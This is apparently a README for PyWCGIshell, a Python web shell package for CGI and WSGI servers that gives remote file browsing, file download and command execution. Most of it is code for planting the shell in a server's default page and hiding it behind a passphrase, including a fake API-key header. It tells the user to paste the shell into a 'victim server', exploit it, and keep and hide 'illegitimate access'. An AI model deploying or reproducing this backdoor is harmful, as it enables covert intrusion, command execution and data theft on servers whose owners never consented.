This package implement a WebShell for CGI and WSGI server.
With this WebShell you can:
- explore directories and download files
- execute command lines (with command history)
- show basic informations about environment server
- show environments variables
This package require :
- python3
- python3 Standard Library
pip install PyWCGIshell(Command line is useful to try the webshell)
python3 -m PyWCGIshell wsgi # Try it in wsgi modefrom PyWCGIshell import WebShell
def my_default_cgi_page():
print("Content-type:text/plain; charset=utf-8")
print("")
print("Hello World !")
webshell = WebShell()
webshell.standard_page = my_default_cgi_page
webshell.run()from PyWCGIshell import WebShell
def my_default_wsgi_page(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain; charset=utf-8')]
start_response(status, headers)
return [b"Hello World !"]
webshell = WebShell(type_="wsgi")
webshell.standard_page = my_default_wsgi_page
application = webshell.run
# Apache with mod_wsgi use the "application" as default functionfrom PyWCGIshell import WebShell
webshell = WebShell(type_="cgi", passphrase="SHELL", pass_type="method")
webshell.run()I don't recommend using method like pass_type to hide your WebShell.
You can use similar configuration to hide your WebShell.
from PyWCGIshell import WebShell
webshell = WebShell(type_="wsgi", passphrase="<inexistant api key>", pass_type="header_value")
application = webshell.runTo use this WebShell:
- Configure (server type, passphrase and passphrase location) and copy the WebShell code or install it
- Paste it in the default page of the victim server or import it
- Send a request with the passphrase and exploit the weak server
Install and configure PyWCGIshell on WebScripts to keep your illegitimate access and hide it (repo is here).
WebShell on WebScripts - Youtube
Licensed under the GPL, version 3.